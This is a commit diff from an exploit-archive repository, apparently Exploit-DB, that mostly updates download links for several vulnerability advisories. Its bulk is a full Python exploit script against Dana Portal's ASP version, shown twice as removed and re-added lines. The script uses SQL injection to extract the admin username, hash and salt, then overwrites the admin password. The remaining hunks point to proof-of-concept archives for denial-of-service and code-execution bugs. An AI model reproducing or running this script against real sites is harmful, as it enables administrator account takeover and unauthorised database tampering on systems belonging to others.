pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 14 additions & 13 deletions b/‎files.csv‎
Lines changed: 14 additions & 13 deletions
diff --git a/‎platforms/asp/webapps/8719.py‎
Lines changed: 132 additions & 132 deletions b/‎platforms/asp/webapps/8719.py‎
Lines changed: 132 additions & 132 deletions
diff --git a/‎platforms/cgi/webapps/17653.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/cgi/webapps/17653.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/linux/dos/33585.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/linux/dos/33585.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/linux/dos/36633.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/linux/dos/36633.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/linux/dos/36669.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/linux/dos/36669.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/multiple/dos/15086.py‎
Lines changed: 1 addition & 1 deletion b/‎platforms/multiple/dos/15086.py‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/multiple/dos/36570.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/multiple/dos/36570.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/multiple/dos/9731.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/multiple/dos/9731.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/multiple/remote/22509.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/multiple/remote/22509.txt‎
Lines changed: 1 addition & 1 deletion
@@ -1,132 +1,132 @@
-#!/usr/bin/python
-# Abysssec Inc Public Exploit Code
-# Title  : Dana Portal Remote Change Admin Password Exploit
-# Affected Version : ASP Version
-# Vulnerable File : albumdetail.asp
-# Vendor  Site   : www.dana.ir
-
-# note :  no point to keep it private anymore .
-# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version 
-# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
-# The alghorithm is not really hard to break and writing cracker tool but i prefered 
-# To update admin password (SH1 + Salt ) with "hacked" word . 
-# this exploit is just for educational purpose and author will  be not be responsible for any damage using this exploit .
-# feel free to contact me at : admin [at] abysssec.com 
-
-# for working  with this exploit you need two asp file for updating hash you can download both from : 
-# www.abysssec.com/files/dana.zip
-# www.milw0rm.com/sploits/2009-dana.zip
-
-# then need to upload asp files and change  this "http://wwww.yourasphost.com/salt.asp?salt="  in exploit code
-
-import string
-import urllib
-import sys
-import re
-
-def Abysssec():
-        print "\n"
-        print "#####################################################"
-        print "#     DanaPortal Remote Change Password Exploit     #"
-        print "#              	 www.Abysssec.com              	   #"
-        print "#####################################################"
-        print "\n"
-
-
-
-#Call Banner
-Abysssec()
-
-print "\n[+] Target Host: e.g: http://site.com/danaportal/"
-try:
-        host=raw_input("\nTarget Host : ")
-except KeyboardInterrupt:
-        print "\n[-] Program Terminated"
-        sys.exit()
-
-
-print "\n[+] Trying  To Connect ...\n"
-
-# Check Http in string
-if host[:7] == "http://":
-        pass
-else:
-        host = "http://"+host
-
-        
-#SQL Injection URL
-sql_inject=host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+username+from+tblAuthor)--"
-
-response = urllib.urlopen(sql_inject).read()
-
-print "[+] Trying  To Inject Code ...\n"
-
-#Extract Admin User
-findall_users=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
-found_users=findall_users(response)
-
-#check found user length
-if len(found_ussers)==0:
-    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
-    sys.exit()
-        
-
-print "\n[+] Admin User :  ",found_users[0]
-
-# Extract Admin Hash
-hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
-response = urllib.urlopen(hash_inject).read()
-findall_hashs=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
-found_hashs=findall_hashs(response)
-if len(found_hashs)==0:
-    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
-    sys.exit()
-    
-print "\n[+] Admin Hash :  ",found_hashs[0]
-
-# Extract Admin Salt
-salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
-response = urllib.urlopen(salt_inject).read()
-findall_salt=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
-found_salt=findall_salt(response)
-if len(found_salt)==0:
-    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
-    sys.exit()    
-print "\n[+] Admin Salt :  ",found_salt[0]
-
-
-# Extract User Code
-usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
-response = urllib.urlopen(usercode_inject).read()
-findall_usercode=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
-found_usercode=findall_usercode(response)
-if len(found_usercode)==0:
-    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
-    sys.exit()
-    
-print "\n[+] Admin Code :  ",found_usercode[0]
-
-# Generate New Hash + Salt
-update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
-response = urllib.urlopen(update_password).read()
-findall_update=re.compile('(\w+)</object>').findall
-
-found_update=findall_update(response)
-
-updated_hash = ''.join(found_update)
-
-# Update Password
-usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
-
-response = urllib.urlopen(usercode_inject).read()
-
-if len(response) == 0:
-        print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
-        sys.exit()
-else:
-        print "[+] Updated Successfully \n"
-        print "[+] Login Url : "+host+"/manage"
-        print "[+] Username  : "+found_users[0]
-        print "[+] Password  : hacked"
-
-# milw0rm.com [2009-05-18]
+#!/usr/bin/python
+# Abysssec Inc Public Exploit Code
+# Title  : Dana Portal Remote Change Admin Password Exploit
+# Affected Version : ASP Version
+# Vulnerable File : albumdetail.asp
+# Vendor  Site   : www.dana.ir
+
+# note :  no point to keep it private anymore .
+# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version 
+# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
+# The alghorithm is not really hard to break and writing cracker tool but i prefered 
+# To update admin password (SH1 + Salt ) with "hacked" word . 
+# this exploit is just for educational purpose and author will  be not be responsible for any damage using this exploit .
+# feel free to contact me at : admin [at] abysssec.com 
+
+# for working  with this exploit you need two asp file for updating hash you can download both from : 
+# www.abysssec.com/files/dana.zip
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip
+
+# then need to upload asp files and change  this "http://wwww.yourasphost.com/salt.asp?salt="  in exploit code
+
+import string
+import urllib
+import sys
+import re
+
+def Abysssec():
+        print "\n"
+        print "#####################################################"
+        print "#     DanaPortal Remote Change Password Exploit     #"
+        print "#              	 www.Abysssec.com              	   #"
+        print "#####################################################"
+        print "\n"
+
+
+
+#Call Banner
+Abysssec()
+
+print "\n[+] Target Host: e.g: http://site.com/danaportal/"
+try:
+        host=raw_input("\nTarget Host : ")
+except KeyboardInterrupt:
+        print "\n[-] Program Terminated"
+        sys.exit()
+
+
+print "\n[+] Trying  To Connect ...\n"
+
+# Check Http in string
+if host[:7] == "http://":
+        pass
+else:
+        host = "http://"+host
+
+        
+#SQL Injection URL
+sql_inject=host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+username+from+tblAuthor)--"
+
+response = urllib.urlopen(sql_inject).read()
+
+print "[+] Trying  To Inject Code ...\n"
+
+#Extract Admin User
+findall_users=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
+found_users=findall_users(response)
+
+#check found user length
+if len(found_ussers)==0:
+    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+    sys.exit()
+        
+
+print "\n[+] Admin User :  ",found_users[0]
+
+# Extract Admin Hash
+hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
+response = urllib.urlopen(hash_inject).read()
+findall_hashs=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
+found_hashs=findall_hashs(response)
+if len(found_hashs)==0:
+    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+    sys.exit()
+    
+print "\n[+] Admin Hash :  ",found_hashs[0]
+
+# Extract Admin Salt
+salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
+response = urllib.urlopen(salt_inject).read()
+findall_salt=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
+found_salt=findall_salt(response)
+if len(found_salt)==0:
+    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+    sys.exit()    
+print "\n[+] Admin Salt :  ",found_salt[0]
+
+
+# Extract User Code
+usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
+response = urllib.urlopen(usercode_inject).read()
+findall_usercode=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
+found_usercode=findall_usercode(response)
+if len(found_usercode)==0:
+    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+    sys.exit()
+    
+print "\n[+] Admin Code :  ",found_usercode[0]
+
+# Generate New Hash + Salt
+update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
+response = urllib.urlopen(update_password).read()
+findall_update=re.compile('(\w+)</object>').findall
+
+found_update=findall_update(response)
+
+updated_hash = ''.join(found_update)
+
+# Update Password
+usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
+
+response = urllib.urlopen(usercode_inject).read()
+
+if len(response) == 0:
+        print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+        sys.exit()
+else:
+        print "[+] Updated Successfully \n"
+        print "[+] Login Url : "+host+"/manage"
+        print "[+] Username  : "+found_users[0]
+        print "[+] Password  : hacked"
+
+# milw0rm.com [2009-05-18]
@@ -10,4 +10,4 @@ http://malerisch.net/docs/advisories/adobe_robohelp_dom_cross_site_scripting_xss
 For reference, original vendor advisory:
 http://www.adobe.com/support/security/bulletins/apsb11-23.html
 
-Mirror: http://www.exploit-db.com/download_pdf/17653
+Mirror: http://www.exploit-db.com/docs/17653.pdf
@@ -8,4 +8,4 @@ Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.
 
 NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled.
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33585.tgz
@@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte
 
 Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable. 
 
-http://www.exploit-db.com/sploits/36633.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36633.zip
@@ -4,4 +4,4 @@ Apache APR is prone to a denial-of-service vulnerability.
 
 An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.
 
-http://www.exploit-db.com/sploits/36669.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36669.zip
@@ -7,7 +7,7 @@
  |_|  |_|\____/_/    \_\____/|____/ 
 
 http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
-http://www.exploit.db.com/sploits/moaub-23-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-exploit.zip
 '''
 
 '''
 
@@ -4,4 +4,4 @@ Rockwell Automation FactoryTalk Activation Server is prone to multiple remote de
 
 An attacker can exploit these issues to crash the affected application, denying service to legitimate users. 
 
-http://www.exploit-db.com/sploits/36570.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36570.zip
@@ -20,5 +20,5 @@ snort-2.8.4
 snort-2.8.5.beta*
 
 link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html
-poc: http://www.exploit-db.com/archive/2009-snort-unified1_bug.tar.gz
+poc: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/2009-snort-unified1_bug.tar.gz
 # milw0rm.com [2009-09-21]
@@ -15,7 +15,7 @@ potential damage to their assets caused by Sophos.
 The paper is available to download at the link below.
 
 https://lock.cmpxchg8b.com/sophailv2.pdf
-http://www.exploit-db.com/wp-content/themes/exploit/docs/22510.pdf
+http://www.exploit-db.com/docs/22510.pdf
 
 A working exploit for Sophos 8.0.6 on Mac is available, however the
 techniques used in the exploit easily transfer to Windows and Linux,
Original file line number	Diff line number	Diff line change
`@@ -8,4 +8,4 @@ Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.`
`8`	`8`
`9`	`9`	`NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled.`
`10`	`10`
`11`		`-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/`
	`11`	`+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33585.tgz`
Original file line number	Diff line number	Diff line change
`@@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte`
`6`	`6`
`7`	`7`	`Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable.`
`8`	`8`
`9`		`-http://www.exploit-db.com/sploits/36633.zip`
	`9`	`+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36633.zip`
Original file line number	Diff line number	Diff line change
`@@ -4,4 +4,4 @@ Apache APR is prone to a denial-of-service vulnerability.`
`4`	`4`
`5`	`5`	`An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.`
`6`	`6`
`7`		`-http://www.exploit-db.com/sploits/36669.zip`
	`7`	`+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36669.zip`
Original file line number	Diff line number	Diff line change
`@@ -4,4 +4,4 @@ Rockwell Automation FactoryTalk Activation Server is prone to multiple remote de`
`4`	`4`
`5`	`5`	`An attacker can exploit these issues to crash the affected application, denying service to legitimate users.`
`6`	`6`
`7`		`-http://www.exploit-db.com/sploits/36570.zip`
	`7`	`+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36570.zip`